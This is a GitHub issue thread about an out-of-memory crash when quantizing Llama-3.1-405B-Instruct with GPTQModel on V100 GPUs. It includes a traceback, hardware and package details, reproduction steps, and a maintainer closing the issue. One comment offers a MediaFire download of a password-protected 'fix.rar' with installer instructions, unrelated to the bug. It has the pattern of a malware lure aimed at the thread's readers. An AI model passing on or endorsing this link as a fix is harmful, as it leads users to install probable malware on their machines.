### ISSUE TITLE
[BUG] OOM when quantize the llama-3.1-405B-instruct model

### ISSUE THREAD

**Issue by nctu6** [ModelCloud/GPTQModel#383]
**Describe the bug**

Quantizing mlp.down_proj in layer 0 of 125:   0%|                                            | 0/126 [00:44<?, ?it/s]
Traceback (most recent call last):
  File "/home/bhlin6nctu/t-mac/GPTQModel/example.py", line 120, in <module>
    main()
  File "/home/bhlin6nctu/t-mac/GPTQModel/example.py", line 57, in main
    model.quantize(calibration_dataset)
  File "/home/bhlin6nctu/t-mac/GPTQModel/gptqmodel/models/base.py", line 506, in quantize
    scale, zero, g_idx, duration, avg_loss, damp_percent = gptq[name].fasterquant(
  File "/home/bhlin6nctu/miniconda3/envs/gptqmodel/lib/python3.10/site-packages/torch/utils/_contextlib.py", line 116, in decorate_context
    return func(*args, **kwargs)
  File "/home/bhlin6nctu/t-mac/GPTQModel/gptqmodel/quantization/gptq.py", line 122, in fasterquant
    H = torch.linalg.cholesky(H)
torch.OutOfMemoryError: CUDA out of memory. Tried to allocate 10.56 GiB. GPU 0 has a total capacity of 31.75 GiB of which 3.81 GiB is free. Process 9680 has 27.93 GiB memory in use. Of the allocated memory 26.31 GiB is allocated by PyTorch, and 1.22 GiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation.  See documentation for Memory Management  (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)

**GPU Info**

```
nvidia-smi
```

+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.161.03   Driver Version: 470.161.03   CUDA Version: 12.4     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-SXM2...  On   | 00000000:1B:00.0 Off |                    0 |
| N/A   29C    P0    42W / 300W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   1  Tesla V100-SXM2...  On   | 00000000:1C:00.0 Off |                    0 |
| N/A   25C    P0    40W / 300W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   2  Tesla V100-SXM2...  On   | 00000000:3D:00.0 Off |                    0 |
| N/A   26C    P0    41W / 300W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   3  Tesla V100-SXM2...  On   | 00000000:3E:00.0 Off |                    0 |
| N/A   28C    P0    42W / 300W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   4  Tesla V100-SXM2...  On   | 00000000:B1:00.0 Off |                    0 |
| N/A   25C    P0    41W / 300W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   5  Tesla V100-SXM2...  On   | 00000000:B2:00.0 Off |                    0 |
| N/A   27C    P0    41W / 300W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   6  Tesla V100-SXM2...  On   | 00000000:DB:00.0 Off |                    0 |
| N/A   27C    P0    43W / 300W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   7  Tesla V100-SXM2...  On   | 00000000:DC:00.0 Off |                    0 |
| N/A   25C    P0    41W / 300W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

**Software Info**

Operation System/Version + Python Version

Show output of:
```
pip show gptqmodel torch transformers accelerate triton
```
Name: gptqmodel
Version: 1.0.3.dev0
Summary: A LLM quantization package with user-friendly apis. Based on GPTQ algorithm.
Home-page: https://github.com/ModelCloud/GPTQModel
Author: ModelCloud
Author-email: qubitium@modelcloud.ai
License: 
Location: /home/bhlin6nctu/miniconda3/envs/gptqmodel/lib/python3.10/site-packages
Requires: accelerate, auto-round, datasets, gekko, huggingface-hub, intel-extension-for-transformers, lm-eval, ninja, numpy, packaging, protobuf, rouge, safetensors, sentencepiece, threadpoolctl, torch, tqdm, transformers, triton
Required-by: 

Name: torch
Version: 2.4.0
Summary: Tensors and Dynamic neural networks in Python with strong GPU acceleration
Home-page: https://pytorch.org/
Author: PyTorch Team
Author-email: packages@pytorch.org
License: BSD-3
Location: /home/bhlin6nctu/miniconda3/envs/gptqmodel/lib/python3.10/site-packages
Requires: filelock, fsspec, jinja2, networkx, nvidia-cublas-cu12, nvidia-cuda-cupti-cu12, nvidia-cuda-nvrtc-cu12, nvidia-cuda-runtime-cu12, nvidia-cudnn-cu12, nvidia-cufft-cu12, nvidia-curand-cu12, nvidia-cusolver-cu12, nvidia-cusparse-cu12, nvidia-nccl-cu12, nvidia-nvtx-cu12, sympy, triton, typing-extensions
Required-by: accelerate, auto-round, bitblas, gptqmodel, lm_eval, peft

Name: transformers
Version: 4.44.2
Summary: State-of-the-art Machine Learning for JAX, PyTorch and TensorFlow
Home-page: https://github.com/huggingface/transformers
Author: The Hugging Face team (past and future) with the help of all our contributors (https://github.com/huggingface/transformers/graphs/contributors)
Author-email: transformers@huggingface.co
License: Apache 2.0 License
Location: /home/bhlin6nctu/miniconda3/envs/gptqmodel/lib/python3.10/site-packages
Requires: filelock, huggingface-hub, numpy, packaging, pyyaml, regex, requests, safetensors, tokenizers, tqdm
Required-by: auto-round, gptqmodel, intel-extension-for-transformers, lm_eval, peft

Name: accelerate
Version: 0.33.0
Summary: Accelerate
Home-page: https://github.com/huggingface/accelerate
Author: The HuggingFace team
Author-email: zach.mueller@huggingface.co
License: Apache
Location: /home/bhlin6nctu/miniconda3/envs/gptqmodel/lib/python3.10/site-packages
Requires: huggingface-hub, numpy, packaging, psutil, pyyaml, safetensors, torch
Required-by: auto-round, gptqmodel, lm_eval, peft

Name: triton
Version: 3.0.0
Summary: A language and compiler for custom Deep Learning operations
Home-page: https://github.com/triton-lang/triton/
Author: Philippe Tillet
Author-email: phil@openai.com
License: 
Location: /home/bhlin6nctu/miniconda3/envs/gptqmodel/lib/python3.10/site-packages
Requires: filelock
Required-by: auto-round, gptqmodel, torch

**If you are reporting an inference bug of a post-quantized model, please post the content of `config.json` and `quantize_config.json`.**

**To Reproduce**

How to reproduce this bug if possible.
1. save the examples/basic_usage.py to example.py
2. modify the quantize_config with
   bits = 4,
   group_size = 128,
   desc_act = False,
3. modify pretrained_model_id to the directory of Meta-Llama-3.1-405B-Instruct
4. modify quantized_model_id to the output directory (e.g. llama-3.1-405b-inst-w4g128)

**Expected behavior**

1. The example.py should successfully quantize the 405B model.

**Model/Datasets**

Make sure your model/dataset is downloadable (on HF for example) so we can reproduce your issue.
calibration_dataset = [
    tokenizer(
        "gptqmodel is an easy-to-use model quantization library with user-friendly apis, based on GPTQ algorithm."
    )
]

**Screenshots**

**Additional context**

Regards.

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qubitium** [comment]
Closing this as it may no longer apply due to recent changes to transformers and gptqmodel. Feel free to open if this is still an issue.
